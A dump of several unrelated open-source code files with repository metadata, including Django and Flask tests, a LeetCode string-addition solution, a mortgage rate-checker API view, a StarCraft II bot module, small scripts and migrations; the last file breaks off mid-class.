] | 12 | 2020-12-22T22:36:28.000Z | 2021-01-18T13:39:34.000Z | app/tests/support/test_views.py | Valaraucoo/raven | 0157e193baf569be9479a78838dc26d77a11a99d | [
"BSD-3-Clause"
] | 2 | 2020-12-27T21:52:39.000Z | 2021-11-18T08:08:25.000Z | import pytest
from django.urls import reverse
from tests.users import factories as users_factories
@pytest.mark.django_db
class TestTicketCreateView:
    def test_get(self, client):
url = reverse('support:support-contact')
response = client.get(url)
assert response.status_code == 200
    def test_post(self, client):
url = reverse('support:support-contact')
response = client.post(url)
assert response.status_code == 200
user = users_factories.StudentFactory()
data = {
"email": user.email,
"category": '1',
"fullname": f'{user.first_name} {user.last_name}',
"description": "problem"
}
response = client.post(url, data=data)
assert response.status_code == 200
data['category'] = '2'
response = client.post(url, data=data)
assert response.status_code == 200
data['category'] = '3'
response = client.post(url, data=data)
assert response.status_code == 200
data['category'] = '0'
response = client.post(url, data=data)
assert response.status_code == 200
| 26.022222 | 62 | 0.608027 | 132 | 1,171 | 5.295455 | 0.333333 | 0.120172 | 0.171674 | 0.206009 | 0.615165 | 0.615165 | 0.529328 | 0.529328 | 0.529328 | 0.37196 | 0 | 0.026005 | 0.277541 | 1,171 | 44 | 63 | 26.613636 | 0.800236 | 0 | 0 | 0.387097 | 0 | 0 | 0.125534 | 0.039283 | 0 | 0 | 0 | 0 | 0.193548 | 1 | 0.064516 | false | 0 | 0.096774 | 0 | 0.193548 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
25dbcc8ad9f17eebc5ce137f97fcdf06a4148e19 | 1,827 | py | Python | lc0415_add_strings.py | bowen0701/python-algorithms-data-structures | e625f59a9fc59e4728825078d4434a7968a724e5 | [
"BSD-2-Clause"
] | 8 | 2019-03-18T06:37:24.000Z | 2022-01-30T07:50:58.000Z | lc0415_add_strings.py | bowen0701/python-algorithms-data-structures | e625f59a9fc59e4728825078d4434a7968a724e5 | [
"BSD-2-Clause"
] | null | null | null | lc0415_add_strings.py | bowen0701/python-algorithms-data-structures | e625f59a9fc59e4728825078d4434a7968a724e5 | [
"BSD-2-Clause"
] | null | null | null | """Leetcode 415. Add Strings
Easy
URL: https://leetcode.com/problems/add-strings/
Given two non-negative integers num1 and num2 represented as string,
return the sum of num1 and num2.
Note:
- The length of both num1 and num2 is < 5100.
- Both num1 and num2 contains only digits 0-9.
- Both num1 and num2 does not contain any leading zero.
- You must not use any built-in BigInteger library or convert the inputs to
integer directly.
"""
class SolutionPaddingAddBackwardIter(object):
def _padding(self, num1, num2):
n1, n2 = len(num1), len(num2)
if n1 < n2:
num1 = '0' * (n2 - n1) + num1
elif n1 > n2:
num2 = '0' * (n1 - n2) + num2
return num1, num2
def addStrings(self, num1, num2):
"""
:type num1: str
:type num2: str
:rtype: str
Time complexity: O(n).
Space complexity: O(1).
"""
from collections import deque
# Pad shorter num with leading zeros to string of equal length.
num1, num2 = self._padding(num1, num2)
# Start with carry 0, add digits of num1 & num2 from backward to array.
sum_arr = deque([])
i = len(num1) - 1
carry = 0
while i >= 0 or carry > 0:
if i >= 0:
val = int(num1[i]) + int(num2[i]) + carry
else:
val = carry
carry, val = val // 10, val % 10
sum_arr.appendleft(str(val))
i -= 1
return ''.join(list(sum_arr))
def main():
# Output: 807.
num1 = '342'
num2 = '465'
    print(SolutionPaddingAddBackwardIter().addStrings(num1, num2))
# Output: 10110.
num1 = '9999'
num2 = '111'
    print(SolutionPaddingAddBackwardIter().addStrings(num1, num2))
if __name__ == '__main__':
main()
| 25.027397 | 79 | 0.571429 | 238 | 1,827 | 4.331933 | 0.453782 | 0.062076 | 0.053346 | 0.043647 | 0.102813 | 0 | 0 | 0 | 0 | 0 | 0 | 0.076737 | 0.322386 | 1,827 | 72 | 80 | 25.375 | 0.756058 | 0.087028 | 0 | 0.0625 | 0 | 0 | 0.021415 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.03125 | null | null | 0.0625 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
25dbd0ea80f4dcc92776fe99c6632dc557ac3ea6 | 4,574 | py | Python | tests/version2/test_users.py | SimonAwiti/Questioner-APIs | 514de4fd3af1726b7f89525c6bfaaed230842853 | [
"MIT"
] | null | null | null | tests/version2/test_users.py | SimonAwiti/Questioner-APIs | 514de4fd3af1726b7f89525c6bfaaed230842853 | [
"MIT"
] | 2 | 2019-01-15T16:02:32.000Z | 2019-01-23T03:32:29.000Z | tests/version2/test_users.py | SimonAwiti/Questioner-APIs | 514de4fd3af1726b7f89525c6bfaaed230842853 | [
"MIT"
] | 1 | 2019-01-13T23:39:06.000Z | 2019-01-13T23:39:06.000Z | """Tests for handling the users resource"""
import unittest
import json
from app import create_app
from app.API.utilities.database import connection
class UserTestCase(unittest.TestCase):
"""Unit testiing for the user regsitration endpoint"""
def setUp(self):
"""Initialize the app and database connections"""
self.app = create_app(config_name="testing")
self.client = self.app.test_client
self.user = {
"firstname" : "Ken",
"lastname" : "joseph",
"email" : "mysecret12@gmail.com",
"password" : "jos@Aeph12",
"confirm" : "jos@Aeph12",
}
self.user2 = {
"firstname" : "simon",
"lastname" : "jose",
"email" : "myseuuret12@gmail.com",
"password" : "joseph12",
}
self.user3 = {
"firstname" : "Ken",
"lastname" : "joseph",
"email" : "mysecret12@gmail.com",
"password" : "jo@Aeph12",
"confirm" : "jo@Aeph12",
}
self.user4 = {
"firstname" : "Ken",
"lastname" : "joseph",
"email" : "mysecret12gmail.com",
"password" : "jo@Aeph12",
"confirm" : "jo@Aeph12",
}
self.user5 = {
"firstname" : "Ken",
"lastname" : "joseph",
"email" : "mysecret12@gmail.com",
"password" : "josAeph12",
"confirm" : "jos@Aeph12",
}
with self.app.app_context():
connection.initializedb()
def create_user(self):
response = self.client().post('/api/v2/users/auth/register',
data=json.dumps(self.user),
content_type='application/json')
def tearDown(self):
"""Drops all tables after tests are done"""
with self.app.app_context():
connection.dbconnection()
connection.drop_tables()
def test_user_register(self):
"""Test to successfuly register a new user reg"""
response = self.client().post('/api/v2/users/auth/register',
data=json.dumps(self.user),
content_type='application/json')
#self.assertEqual(response.status_code, 201)
#self.assertIn('User Successfully Created', str(response.data))
def test_user_login(self):
"""Successfully log into the app"""
self.create_user()
response = self.client().post('/api/v2/users/auth/login',
data=json.dumps(self.user),
content_type='application/json')
#self.assertEqual(response.status_code, 200)
#self.assertIn('User Successfully logged in', str(response.data))
def test_login_wrong_passwords(self):
"""Tests for checking if password match"""
response = self.client().post(
'/api/v2/users/auth/login',
data=json.dumps(self.user2),
content_type='application/json')
#self.assertEqual(response.status_code, 401)
#self.assertIn("Error logging in, credentials not found", str(response.data))
def test_add_user_who_exists(self):
"""Tests for adding a new user who exists"""
self.create_user()
response = self.client().post(
'/api/v2/users/auth/register',
data=json.dumps(self.user),
content_type='application/json'
)
#self.assertEqual(response.status_code, 409)
#self.assertIn("There is a user with the same email registere", str(response.data))
def test_add_user_with_poor_email(self):
"""Tests for adding a new user with poor email"""
response = self.client().post(
'/api/v2/users/auth/register',
data=json.dumps(self.user4),
content_type='application/json'
)
#self.assertEqual(response.status_code, 401)
#self.assertIn("Invalid email provided", str(response.data))
def test_add_user_with_diff_pass(self):
"""Tests for adding a new user with diff password"""
response = self.client().post(
'/api/v2/users/auth/register',
data=json.dumps(self.user5),
content_type='application/json'
)
#self.assertEqual(response.status_code, 401)
#self.assertIn("Passwords do not match", str(response.data))
| 37.491803 | 91 | 0.547879 | 471 | 4,574 | 5.227176 | 0.265393 | 0.032494 | 0.051178 | 0.062551 | 0.586515 | 0.556052 | 0.530869 | 0.50853 | 0.43095 | 0.361495 | 0 | 0.01943 | 0.32488 | 4,574 | 122 | 92 | 37.491803 | 0.77785 | 0.233931 | 0 | 0.482353 | 0 | 0 | 0.205635 | 0.059251 | 0 | 0 | 0 | 0 | 0 | 1 | 0.105882 | false | 0.082353 | 0.047059 | 0 | 0.164706 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
25e441bb1d41908f9089cf20c37bdbf87f2df670 | 8,415 | py | Python | ratechecker/views.py | DalavanCloud/owning-a-home-api | f7be713740ecfaaaf3fc2f54510c24543e563e9f | [
"CC0-1.0"
] | 1 | 2019-02-25T21:46:14.000Z | 2019-02-25T21:46:14.000Z | ratechecker/views.py | DalavanCloud/owning-a-home-api | f7be713740ecfaaaf3fc2f54510c24543e563e9f | [
"CC0-1.0"
] | null | null | null | ratechecker/views.py | DalavanCloud/owning-a-home-api | f7be713740ecfaaaf3fc2f54510c24543e563e9f | [
"CC0-1.0"
] | null | null | null | from django.db.models import Q, Sum, Avg
from rest_framework import status
from rest_framework.decorators import api_view
from rest_framework.response import Response
from rest_framework.views import APIView
from ratechecker.models import Region, Rate, Adjustment, Fee
from ratechecker.ratechecker_parameters import ParamsSerializer
def get_rates(params_data, data_load_testing=False, return_fees=False):
""" params_data is a method parameter of type RateCheckerParameters."""
# the precalculated results are done by favoring negative points over
# positive ones, and the API does the opposite
factor = 1
if data_load_testing:
factor = -1
region_ids = list(Region.objects.filter(
state_id=params_data.get('state')).values_list('region_id', flat=True))
if not region_ids:
return {'data': {}, 'timestamp': None}
rates = Rate.objects.filter(
region_id__in=region_ids,
product__loan_purpose=params_data.get('loan_purpose'),
product__pmt_type=params_data.get('rate_structure'),
product__loan_type=params_data.get('loan_type'),
product__max_ltv__gte=params_data.get('max_ltv'),
product__loan_term=params_data.get('loan_term'),
product__max_loan_amt__gte=params_data.get('loan_amount'),
product__max_fico__gte=params_data.get('maxfico'),
product__min_fico__lte=params_data.get('minfico'))
if params_data.get('loan_type') != 'FHA-HB':
rates = rates.filter(
product__min_loan_amt__lte=params_data.get('loan_amount'))
if params_data.get('rate_structure') == 'ARM':
rates = rates.filter(
product__int_adj_term=params_data.get('arm_type')[:-2],
product__io=bool(params_data.get('io')))
if data_load_testing:
rates = rates.filter(
product__institution=params_data.get('institution'),
lock=params_data.get('lock'))
else:
rates = rates.filter(
lock__lte=params_data.get('max_lock', 0),
lock__gt=params_data.get('min_lock', 0))
all_rates = []
products = {}
for rate in rates:
all_rates.append(rate)
products["{}{}".format(
rate.product_id, rate.region_id)] = rate.product_id
product_ids = products.values()
adjustments = Adjustment.objects.filter(
product__plan_id__in=product_ids).filter(
Q(max_loan_amt__gte=params_data.get('loan_amount'))
| Q(max_loan_amt__isnull=True),
Q(min_loan_amt__lte=params_data.get('loan_amount'))
| Q(min_loan_amt__isnull=True),
Q(prop_type=params_data.get('property_type'))
| Q(prop_type__isnull=True) | Q(prop_type=""),
Q(state=params_data.get('state'))
| Q(state__isnull=True) | Q(state=""),
Q(max_fico__gte=params_data.get('maxfico'))
| Q(max_fico__isnull=True),
Q(min_fico__lte=params_data.get('minfico'))
| Q(min_fico__isnull=True),
Q(min_ltv__lte=params_data.get('min_ltv'))
| Q(min_ltv__isnull=True),
Q(max_ltv__gte=params_data.get('max_ltv'))
| Q(max_ltv__isnull=True),
).values('product_id',
'affect_rate_type').annotate(sum_of_adjvalue=Sum('adj_value'))
summed_adj_dict = {}
for adj in adjustments:
current = summed_adj_dict.get(adj['product_id'], {})
current[adj['affect_rate_type']] = adj['sum_of_adjvalue']
summed_adj_dict[adj['product_id']] = current
available_rates = {}
data_timestamp = ""
for rate in all_rates:
        # TODO: check that it is the same every time, and decide what to do if it is not
data_timestamp = rate.data_timestamp
product = summed_adj_dict.get(rate.product_id, {})
rate.total_points += product.get('P', 0)
rate.base_rate += product.get('R', 0)
distance = abs(params_data.get('points') - rate.total_points)
if float(distance) > 0.5:
continue
if rate.product_id not in available_rates:
available_rates[rate.product_id] = rate
else:
current_difference = abs(
params_data.get('points') -
available_rates[rate.product_id].total_points
)
new_difference = abs(params_data.get('points') - rate.total_points)
if new_difference < current_difference or (
new_difference == current_difference and
factor * available_rates[
rate.product_id].total_points < 0 and
factor * rate.total_points > 0):
available_rates[rate.product_id] = rate
data = {}
for rate in available_rates:
key = str(available_rates[rate].base_rate)
current_value = data.get(key, 0)
if data_load_testing:
data[key] = "%s" % available_rates[rate].total_points
else:
data[key] = current_value + 1
results = {'data': data, 'timestamp': data_timestamp}
if return_fees and data:
fees = Fee.objects.filter(plan__plan_id__in=available_rates.keys(),
state_id=params_data.get('state'))
if params_data.get('property_type', 'SF') == 'SF':
fees = fees.filter(single_family=True)
elif params_data.get('property_type', 'SF') == 'CONDO':
fees = fees.filter(condo=True)
elif params_data.get('property_type', 'SF') == 'COOP':
fees = fees.filter(coop=True)
averages = fees.aggregate(
origination_dollar=Avg('origination_dollar'),
origination_percent=Avg('origination_percent'),
third_party=Avg('third_party'))
results['fees'] = averages
if not data:
obj = Region.objects.first()
if obj:
results['timestamp'] = obj.data_timestamp
return results
def set_lock_max_min(data):
"""Set max and min lock values before serializer validation"""
lock_map = {
'30': (0, 30),
'45': (31, 45),
'60': (46, 60)
}
lock = data.get('lock')
if lock and lock in lock_map:
data['min_lock'] = lock_map[lock][0]
data['max_lock'] = lock_map[lock][1]
return data
else:
return data
@api_view(['GET'])
def rate_checker(request):
"""
Return available rates in percentage and number of institutions
with the corresponding rate
(i.e. "4.75": 2 means there are 2 institutions with the rate of 4.75%)
"""
if request.method == 'GET':
        # Clean the parameters: strip leading/trailing spaces and
        # transform them to upper case
fixed_data = dict(map(
lambda (k, v): (k, v.strip().upper()),
request.query_params.iteritems()))
fixed_data = set_lock_max_min(fixed_data)
serializer = ParamsSerializer(data=fixed_data)
if serializer.is_valid():
rate_results = get_rates(serializer.validated_data)
rate_results['request'] = serializer.validated_data
return Response(rate_results)
else:
return Response(serializer.errors,
status=status.HTTP_400_BAD_REQUEST)
@api_view(['GET'])
def rate_checker_fees(request):
"""
Return available rates in percentage and number of institutions
with the corresponding rate along with fees data
"""
if request.method == 'GET':
        # Clean the parameters: strip leading/trailing spaces and
        # transform them to upper case
fixed_data = dict(map(
lambda (k, v): (k, v.strip().upper()),
request.query_params.iteritems()))
serializer = ParamsSerializer(data=fixed_data)
if serializer.is_valid():
rate_results = get_rates(
serializer.validated_data, return_fees=True)
rate_results['request'] = serializer.validated_data
return Response(rate_results)
else:
return Response(
serializer.errors, status=status.HTTP_400_BAD_REQUEST
)
class RateCheckerStatus(APIView):
def get(self, request, format=None):
try:
load_ts = Region.objects.latest('data_timestamp').data_timestamp
except Region.DoesNotExist:
load_ts = None
return Response({'load': load_ts})
| 36.907895 | 79 | 0.627213 | 1,056 | 8,415 | 4.700758 | 0.203598 | 0.070508 | 0.086422 | 0.027397 | 0.389605 | 0.346293 | 0.299758 | 0.260274 | 0.234891 | 0.190169 | 0 | 0.00741 | 0.26227 | 8,415 | 227 | 80 | 37.070485 | 0.792204 | 0.043613 | 0 | 0.2 | 0 | 0 | 0.075372 | 0 | 0 | 0 | 0 | 0.004405 | 0 | 0 | null | null | 0 | 0.04 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
25e493076be7380951a97b3f9afcdfcdb4f2cbab | 2,247 | py | Python | sharpy/managers/combat2/protoss/micro_voidrays.py | raspersc2/sharpy-sc2 | ec8f5870eab233b1d09a54a09bd8b76ea2585735 | [
"MIT"
] | 2 | 2020-08-13T01:25:20.000Z | 2020-11-22T19:00:06.000Z | sharpy/managers/combat2/protoss/micro_voidrays.py | raspersc2/sharpy-sc2 | ec8f5870eab233b1d09a54a09bd8b76ea2585735 | [
"MIT"
] | null | null | null | sharpy/managers/combat2/protoss/micro_voidrays.py | raspersc2/sharpy-sc2 | ec8f5870eab233b1d09a54a09bd8b76ea2585735 | [
"MIT"
] | null | null | null | from sc2.ids.effect_id import EffectId
from sc2.position import Point2
from sc2.units import Units
from sharpy.managers.combat2 import MicroStep, Action, MoveType
from sc2 import AbilityId
from sc2.unit import Unit
class MicroVoidrays(MicroStep):
def should_retreat(self, unit: Unit) -> bool:
if unit.shield_max + unit.health_max > 0:
health_percentage = (unit.shield + unit.health) / (unit.shield_max + unit.health_max)
else:
health_percentage = 0
if health_percentage < 0.2 or unit.weapon_cooldown < 0:
            # retreat if hp is low, or if the unit cannot attack
            # (weapon_cooldown is negative for units that have no weapon)
return True
for effect in self.ai.state.effects:
if effect.id == EffectId.RAVAGERCORROSIVEBILECP:
if Point2.center(effect.positions).distance_to(unit) < 3:
return True
if effect.id == EffectId.BLINDINGCLOUDCP:
if Point2.center(effect.positions).distance_to(unit) < 4:
return True
if effect.id == EffectId.PSISTORMPERSISTENT:
if Point2.center(effect.positions).distance_to(unit) < 4:
return True
return False
def group_solve_combat(self, units: Units, current_command: Action) -> Action:
return current_command
def unit_solve_combat(self, unit: Unit, current_command: Action) -> Action:
if self.engage_ratio < 0.25 and self.can_engage_ratio < 0.25:
return current_command
if self.move_type in {MoveType.PanicRetreat, MoveType.DefensiveRetreat}:
return current_command
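        # Prismatic Alignment boosts Void Ray damage against armored targets,
        # so it is only worth casting when armored enemies are in range.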
if self.cd_manager.is_ready(unit.tag, AbilityId.EFFECT_VOIDRAYPRISMATICALIGNMENT):
close_enemies = self.cache.enemy_in_range(unit.position, 7).filter(lambda u: u.is_armored)
if close_enemies:
return Action(None, False, AbilityId.EFFECT_VOIDRAYPRISMATICALIGNMENT)
if not self.should_shoot() and self.should_retreat(unit):
pos = self.pather.find_weak_influence_air(unit.position, 4)
return Action(pos, False)
return self.focus_fire(unit, current_command, None)
def should_shoot(self):
tick = self.ai.state.game_loop % 24
return tick < 8
| 40.854545 | 102 | 0.655986 | 280 | 2,247 | 5.107143 | 0.367857 | 0.058741 | 0.020979 | 0.037762 | 0.21049 | 0.174126 | 0.105594 | 0.105594 | 0.075524 | 0.075524 | 0 | 0.017533 | 0.263907 | 2,247 | 54 | 103 | 41.611111 | 0.847037 | 0.012016 | 0 | 0.209302 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.093023 | false | 0 | 0.139535 | 0.023256 | 0.534884 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
25f057af076ce41992855839a657edce5d7a7ef6 | 931 | py | Python | scripts/processcore.py | paulscottrobson/flat-forth-compiler | c9df5156219da67c08776445a87e055f8cbb3a82 | [
"MIT"
] | null | null | null | scripts/processcore.py | paulscottrobson/flat-forth-compiler | c9df5156219da67c08776445a87e055f8cbb3a82 | [
"MIT"
] | 1 | 2019-03-03T21:21:07.000Z | 2020-07-02T09:20:31.000Z | scripts/processcore.py | paulscottrobson/flat-forth-compiler | c9df5156219da67c08776445a87e055f8cbb3a82 | [
"MIT"
] | null | null | null | # ***************************************************************************************
# ***************************************************************************************
#
# Name : processcore.py
# Author : Paul Robson (paul@robsons.org.uk)
# Date : 22nd December 2018
# Purpose : Convert vocabulary.asm to assemblable file by adding marker labels.
#
# ***************************************************************************************
# ***************************************************************************************
#
# Copy vocabulary.asm to __words.asm
#
hOut = open("__words.asm","w")
for l in [x.rstrip() for x in open("vocabulary.asm").readlines()]:
hOut.write(l+"\n")
#
#		If ';;' is found, insert a label generated from ASCII codes so any character can be used
#
if l[:2] == ";;":
name = "_".join([str(ord(x)) for x in l[2:].strip()])
hOut.write("core_{0}:\n".format(name))
hOut.close() | 38.791667 | 89 | 0.396348 | 91 | 931 | 3.989011 | 0.681319 | 0.107438 | 0.082645 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.010949 | 0.117078 | 931 | 24 | 90 | 38.791667 | 0.430657 | 0.696026 | 0 | 0 | 0 | 0 | 0.157303 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
25f4632219bc28cba2e575a7f1f0e698d9f3b930 | 307 | py | Python | converters/all_lp2dgf.py | daajoe/transit_graphs | ac9a7b390f0f4c671a4c66157c9ff20773bb0105 | [
"CC-BY-4.0"
] | null | null | null | converters/all_lp2dgf.py | daajoe/transit_graphs | ac9a7b390f0f4c671a4c66157c9ff20773bb0105 | [
"CC-BY-4.0"
] | null | null | null | converters/all_lp2dgf.py | daajoe/transit_graphs | ac9a7b390f0f4c671a4c66157c9ff20773bb0105 | [
"CC-BY-4.0"
] | null | null | null | #!/usr/bin/env bash
ERR_MSG="all_lp2dgf: aborting after error"
trap 'ret=$?; printf "%s\n" "$ERR_MSG" >&2; exit "$ret"' ERR
for file in $(find $1 -name \*.lp.bz2) ; do
echo $file
outputname="../gr/subgraphs/$(basename $file).gr"
./lp2dgf.py -f $file > $outputname
if [ $? -ne 0 ]; then
echo 'ERROR stopping...'
exit 1
fi
done
| 21.928571 | 60 | 0.566775 | 48 | 307 | 3.604167 | 0.791667 | 0.16185 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.025 | 0.218241 | 307 | 13 | 61 | 23.615385 | 0.695833 | 0.058632 | 0 | 0 | 0 | 0 | 0.354167 | 0.090278 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0.1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
25f55d84b2c9772cbbe9d0c481378e4191bf77e2 | 362 | py | Python | formulario/urls.py | exildev/Rondax | a4a4cad4ec9c575a288f66a353e07e9a57362ede | [
"Apache-2.0"
] | null | null | null | formulario/urls.py | exildev/Rondax | a4a4cad4ec9c575a288f66a353e07e9a57362ede | [
"Apache-2.0"
] | null | null | null | formulario/urls.py | exildev/Rondax | a4a4cad4ec9c575a288f66a353e07e9a57362ede | [
"Apache-2.0"
] | null | null | null | from django.conf.urls import include, url
from formulario import views
urlpatterns = [
url(r'^form/registro/(?P<pk>\d+)/$', views.RegistroSupraForm.as_view(), name='form_registro'),
url(r'^form/registro/create/$', views.RegistroCreateSupraForm.as_view(), name='form_crear_registro'),
url(r'^list/campo/$', views.CampoListView.as_view(), name='campo_list'),
] | 45.25 | 102 | 0.740331 | 50 | 362 | 5.22 | 0.52 | 0.045977 | 0.114943 | 0.122605 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.069061 | 362 | 8 | 103 | 45.25 | 0.774481 | 0 | 0 | 0 | 0 | 0 | 0.292011 | 0.140496 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.285714 | 0 | 0.285714 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
25f569e19f03eb74cba3e7ed842d1742b9a17719 | 381 | py | Python | customers/customerauth/migrations/0002_auto_20190127_0931.py | nkmrohit/python | bd644d51909cda548684b5da98eab998564f3568 | [
"Apache-2.0"
] | null | null | null | customers/customerauth/migrations/0002_auto_20190127_0931.py | nkmrohit/python | bd644d51909cda548684b5da98eab998564f3568 | [
"Apache-2.0"
] | null | null | null | customers/customerauth/migrations/0002_auto_20190127_0931.py | nkmrohit/python | bd644d51909cda548684b5da98eab998564f3568 | [
"Apache-2.0"
] | null | null | null | # Generated by Django 2.1.4 on 2019-01-27 04:01
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('customerauth', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='customers',
name='address',
field=models.TextField(blank=True),
),
]
| 20.052632 | 47 | 0.593176 | 39 | 381 | 5.74359 | 0.820513 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.07037 | 0.291339 | 381 | 18 | 48 | 21.166667 | 0.759259 | 0.11811 | 0 | 0 | 1 | 0 | 0.11976 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.083333 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
25fbbd609cc07a46c89f0cadbaed9a2029ec86bf | 1,739 | py | Python | migrations/versions/00f001a958b1_web_dev_chapter3_quiz_total_score.py | GitauHarrison/somasoma_V1 | 2d74ad3b58f7e4ea5334e240d5bd30938f615e24 | [
"MIT"
] | null | null | null | migrations/versions/00f001a958b1_web_dev_chapter3_quiz_total_score.py | GitauHarrison/somasoma_V1 | 2d74ad3b58f7e4ea5334e240d5bd30938f615e24 | [
"MIT"
] | null | null | null | migrations/versions/00f001a958b1_web_dev_chapter3_quiz_total_score.py | GitauHarrison/somasoma_V1 | 2d74ad3b58f7e4ea5334e240d5bd30938f615e24 | [
"MIT"
] | null | null | null | """web dev chapter3 quiz total score
Revision ID: 00f001a958b1
Revises: b95f0132b231
Create Date: 2022-03-02 11:57:04.695611
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '00f001a958b1'
down_revision = 'b95f0132b231'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table('web_dev_chapter3_quiz_total_score',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('total_score', sa.String(length=64), nullable=True),
sa.Column('timestamp', sa.DateTime(), nullable=True),
sa.Column('student_id', sa.Integer(), nullable=True),
sa.ForeignKeyConstraint(['student_id'], ['student.id'], name=op.f('fk_web_dev_chapter3_quiz_total_score_student_id_student')),
sa.PrimaryKeyConstraint('id', name=op.f('pk_web_dev_chapter3_quiz_total_score'))
)
with op.batch_alter_table('web_dev_chapter3_quiz_total_score', schema=None) as batch_op:
batch_op.create_index(batch_op.f('ix_web_dev_chapter3_quiz_total_score_timestamp'), ['timestamp'], unique=False)
batch_op.create_index(batch_op.f('ix_web_dev_chapter3_quiz_total_score_total_score'), ['total_score'], unique=False)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
with op.batch_alter_table('web_dev_chapter3_quiz_total_score', schema=None) as batch_op:
batch_op.drop_index(batch_op.f('ix_web_dev_chapter3_quiz_total_score_total_score'))
batch_op.drop_index(batch_op.f('ix_web_dev_chapter3_quiz_total_score_timestamp'))
op.drop_table('web_dev_chapter3_quiz_total_score')
# ### end Alembic commands ###
| 39.522727 | 130 | 0.748131 | 251 | 1,739 | 4.816733 | 0.282869 | 0.124069 | 0.127378 | 0.163772 | 0.519438 | 0.519438 | 0.449959 | 0.325889 | 0.325889 | 0.325889 | 0 | 0.045425 | 0.126509 | 1,739 | 43 | 131 | 40.44186 | 0.750494 | 0.181139 | 0 | 0.086957 | 0 | 0 | 0.366979 | 0.296323 | 0 | 0 | 0 | 0 | 0 | 1 | 0.086957 | false | 0 | 0.086957 | 0 | 0.173913 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
25fef9ef873e5740a2ff06f1845a4837d7c9fc74 | 916 | py | Python | pos_repair_order/wizard/assign_wizard.py | divyapy/odoo | a4b796fc8a9d291ff1b4c93e53e27f566947adf2 | [
"MIT"
] | null | null | null | pos_repair_order/wizard/assign_wizard.py | divyapy/odoo | a4b796fc8a9d291ff1b4c93e53e27f566947adf2 | [
"MIT"
] | null | null | null | pos_repair_order/wizard/assign_wizard.py | divyapy/odoo | a4b796fc8a9d291ff1b4c93e53e27f566947adf2 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
from odoo import api, fields, models, _
class AssignMechanicWizard(models.TransientModel):
_name = 'assign.mechanic.wizard'
_description = 'Assign Mechanic Wizard'
# relations
